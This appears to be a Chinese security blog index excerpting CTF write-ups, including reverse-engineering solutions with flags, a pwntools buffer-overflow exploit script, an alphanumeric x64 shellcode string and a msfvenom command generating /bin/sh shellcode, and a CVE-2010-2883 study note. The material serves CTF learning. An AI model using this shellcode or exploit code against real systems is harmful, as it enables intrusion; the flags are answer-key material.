idapython

Posted on 2019-11-17 Edited on 2020-08-18 In 基础 , 其他 Views: Valine:
Symbols count in article: 427 Reading time ≈ 1 mins.

idapython 学习

第一个idapython脚本取数据

代码	备注
idc.NextHead	获得下一条指令首地址
idc.PreHead	获得上一条指令首地址
GetOpnd	获得mov esi,1 mov后面的
GetMnem	获得mov esi,1 mov

def getList(start,end):
    List = []
    while start <= end:
        next = idc.NextHead(start) #取下一条指令
        result = int(GetOpnd(start,1)[:-1],16) # 取mov esi,1的1
        # GetMnem(0x4007e1) 取mov esi,1 的mov
        List.append(result)
        start = next
    return List

print(getList(0x4007e1, 0x400851))

攻防世界新手区re

Posted on 2019-11-16 Edited on 2020-08-18 In bin , 逆向 , ctf-逆向 Views: Valine:
Symbols count in article: 5.3k Reading time ≈ 5 mins.

re题目新手区练习

re1

od打开字符串搜一下。
DUTCTF{We1c0met0DUTCTF}

re2

随便乱输一下
zsctf{T9is_tOpic_1s_v5ry_int7resting_b6t_others_are_n0t}

emm，实质就是比较灯。这里没有算法，直接全nop就行了

re3

将输入的转为16进制与已知16进制串对比

红帽杯three

Posted on 2019-11-15 Edited on 2020-08-18 In writeup Views: Valine:
Symbols count in article: 2.3k Reading time ≈ 2 mins.

three

这道题我开始用了jmp ecx。。可能基础没打好吧，让我真正理解nx保护的就是这道了，为什么rop能绕过nx保护，因为rop利用的是ret一个地址，然后这个地址是本身存在代码的，而我那样是直接执行代码，错误的方式

漏洞点

3字节的任意代码执行，我想到了栈迁移，可是用的是jmp ecx，太菜了，技术不娴熟
这题有个小技巧，没开pie并且是写入bss段，所以/bin/sh可以自己写入后确认位置，所以直接execve(“/bin/sh”, NULL, NULL),基础rop的题目。。。

某比赛wp

Posted on 2019-11-15 Edited on 2020-08-18 In writeup Views: Valine:
Symbols count in article: 880 Reading time ≈ 1 mins.

某比赛wp.md

re

Od调试下断后看到，将已知字符串异或后跟输入的比较，截取部分，在写代码

#!/usr/bin/env python
# coding=utf-8

String = "NbWG9;2"
String2 = "JPFjXj"[::-1]
print(String2)

flag= ""
for i in range(len(String)):
    temp = chr(ord(String[i])^0x7)
    flag += temp

for i in range(len(String2)):
    temp = chr(ord(String2[i])^0x33)
    flag += temp
print flag

#flag:{NSCTF_md50b7dfc60761e798328a0d9793f96d4f7}

3ctf复赛wp

Posted on 2019-11-14 Edited on 2020-08-18 In writeup Views: Valine:
Symbols count in article: 2.4k Reading time ≈ 2 mins.

3ctf pwn writeup

唯一一道pwn题

漏洞点

emm，打比赛的时候没看出，整数溢出，然后这里就可以堆溢出了

漏洞利用

buf是一开头就申请的，0x200字节大小，所以read(0, buf, size)的时候size整数溢出的话就可以无限溢出。溢出覆盖好多个chunk，这里攻击第一个fastbin就可以了，改他的结构体指针，然后改atoi就行了

湖湘杯练习赛

Posted on 2019-11-14 Edited on 2020-08-18 In writeup Views: Valine:
Symbols count in article: 3.3k Reading time ≈ 3 mins.

whoami

老题目

#!/usr/bin/env python
# coding=utf-8
from pwn import *
r = process("./whoami")
#r = remote("101.71.29.5",10013)
print r.recv()
r.sendline("1")
print r.recv()
shell_addr = 0x400896
payload = "a"*56+p64(shell_addr)
r.sendline(payload)
r.interactive()

# flag{927d379f30f26948d94a2285cd2d7bd7}

湖湘杯wp

Posted on 2019-11-14 Edited on 2020-08-18 In writeup Views: Valine:
Symbols count in article: 7.4k Reading time ≈ 7 mins.

此文章已被加密，需要输入密码访问。

漏洞分析学习之cve-2010-2883

Posted on 2019-11-14 Edited on 2020-08-18 In bin , pwn , 栈 , windows栈 Views: Valine:
Symbols count in article: 9.6k Reading time ≈ 9 mins.

漏洞分析学习之cve-2010-2883

前言

打ctf打久了，也该学学漏洞分析了，不可能以后的工作就是打ctf吧，照着漏洞战争这本书开始学习吧

环境配置

adobe_reader_9.0_download

win_xp_sp3

vmware 自己下吧

工具：

吾爱破解od
010editor
PdfStreamDumper

shellcode

Posted on 2019-11-07 Edited on 2020-08-18 In bin , pwn , shellcode Views: Valine:
Symbols count in article: 701 Reading time ≈ 1 mins.

纯字母数字shellcode存放

x64 shellcode

1	shellcode = 'PPYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXA'

文章地址

x86 shellcode

msf生成命令

1	msfvenom -a x86 --platform linux -p linux/x86/exec CMD="/bin/sh" -e x86/alpha_upper BufferRegister=eax

funny-stack

Posted on 2019-11-04 Edited on 2020-08-18 In bin , pwn , 栈 , linux栈 Views: Valine:
Symbols count in article: 2.9k Reading time ≈ 3 mins.

有趣的栈题目

题目1

main函数

int __cdecl main(int argc, const char **argv, const char **envp)
{
  sub_80486EC();
  sub_80485E7();
  return 0;
}

子函数

int sub_80486EC()
{
  char v1; // [esp+1Fh] [ebp-9h]

  puts("Enter your name ");
  fflush(stdout);
  __isoc99_scanf("%9s", &v1);
  printf("Welcome %s to participate the 429 ctf!\n", &v1);
  return fflush(stdout);
}